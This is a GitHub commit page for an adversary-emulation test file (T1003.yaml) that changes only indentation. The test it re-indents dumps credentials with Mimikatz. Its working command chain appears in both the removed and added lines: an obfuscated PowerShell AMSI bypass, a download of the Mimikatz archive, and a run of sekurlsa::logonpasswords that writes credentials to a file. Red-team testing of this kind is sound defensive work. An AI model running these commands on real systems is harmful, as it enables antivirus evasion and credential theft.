Skip to content

Commit

Permalink
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Update T1003.yaml
Browse files Browse the repository at this point in the history
updated indentations
prashanthpulisetti authored Jan 19, 2024
1 parent 82c549e commit b810416
Showing 1 changed file with 31 additions and 31 deletions.
62 changes: 31 additions & 31 deletions atomics/T1003/T1003.yaml
Original file line number Diff line number Diff line change
@@ -158,35 +158,35 @@ atomic_tests:
- name: Dumping Credentials using Mimikatz
description: "Demonstrates the capability of Mimikatz to extract credentials from memory, including an AMSI bypass technique."
auto_generated_guid: c70d532b-e6b9-4ef6-9d6e-a8727ec739df
supported_platforms:
- windows
input_arguments:
MimikatzExecutable:
description: "Path to the Mimikatz executable."
type: Path
default: C:\temp\mimikatz.exe
OutputFile:
description: "Path to save the dumped credentials."
type: Path
default: C:\temp\credentials.txt
executor:
name: command_prompt
elevation_required: true
command: |
powershell -Command "sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( '{1}{0}'-F'F','rE' ) ) ; ( GeT-VariaBle ( '1Q2U' +'zX' ) -VaL ).'A`ss`Embly'.'GET`TY`Pe'(( '{6}{3}{1}{4}{2}{0}{5}' -f'Util','A','Amsi','.Management.','utomation.','s','System' ) ).'g`etf`iElD'( ( '{0}{2}{1}' -f'amsi','d','InitFaile' ),( '{2}{4}{0}{1}{3}' -f 'Stat','i','NonPubli','c,' )).'sE`T`VaLUE'( ${n`ULl},${t`RuE} )"
powershell "Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip' -OutFile 'C:\temp\mimikatz.zip'"
powershell "Expand-Archive -Path 'C:\temp\mimikatz.zip' -DestinationPath 'C:\temp'"
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > #{OutputFile}
prerequisites:
- Administrator privileges on the Windows system.
- Internet access to download Mimikatz.
- Configure antivirus software to allow Mimikatz execution for this test.
- Basic command-line proficiency.
cleanup:
- Securely delete the Mimikatz executable, zip file, and output files.
- Reset any altered antivirus settings.
detection:
- Monitor for known Mimikatz process signatures and command-line arguments.
- Detect abnormal access patterns to sensitive files and memory areas.
- Implement behavior-based anomaly detection systems.
supported_platforms:
- windows
input_arguments:
MimikatzExecutable:
description: "Path to the Mimikatz executable."
type: Path
default: C:\temp\mimikatz.exe
OutputFile:
description: "Path to save the dumped credentials."
type: Path
default: C:\temp\credentials.txt
executor:
name: command_prompt
elevation_required: true
command: |
powershell -Command "sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( '{1}{0}'-F'F','rE' ) ) ; ( GeT-VariaBle ( '1Q2U' +'zX' ) -VaL ).'A`ss`Embly'.'GET`TY`Pe'(( '{6}{3}{1}{4}{2}{0}{5}' -f'Util','A','Amsi','.Management.','utomation.','s','System' ) ).'g`etf`iElD'( ( '{0}{2}{1}' -f'amsi','d','InitFaile' ),( '{2}{4}{0}{1}{3}' -f 'Stat','i','NonPubli','c,' )).'sE`T`VaLUE'( ${n`ULl},${t`RuE} )"
powershell "Invoke-WebRequest -Uri 'https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip' -OutFile 'C:\temp\mimikatz.zip'"
powershell "Expand-Archive -Path 'C:\temp\mimikatz.zip' -DestinationPath 'C:\temp'"
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > #{OutputFile}
prerequisites:
- Administrator privileges on the Windows system.
- Internet access to download Mimikatz.
- Configure antivirus software to allow Mimikatz execution for this test.
- Basic command-line proficiency.
cleanup:
- Securely delete the Mimikatz executable, zip file, and output files.
- Reset any altered antivirus settings.
detection:
- Monitor for known Mimikatz process signatures and command-line arguments.
- Detect abnormal access patterns to sensitive files and memory areas.
- Implement behavior-based anomaly detection systems.

0 comments on commit b810416

Please sign in to comment.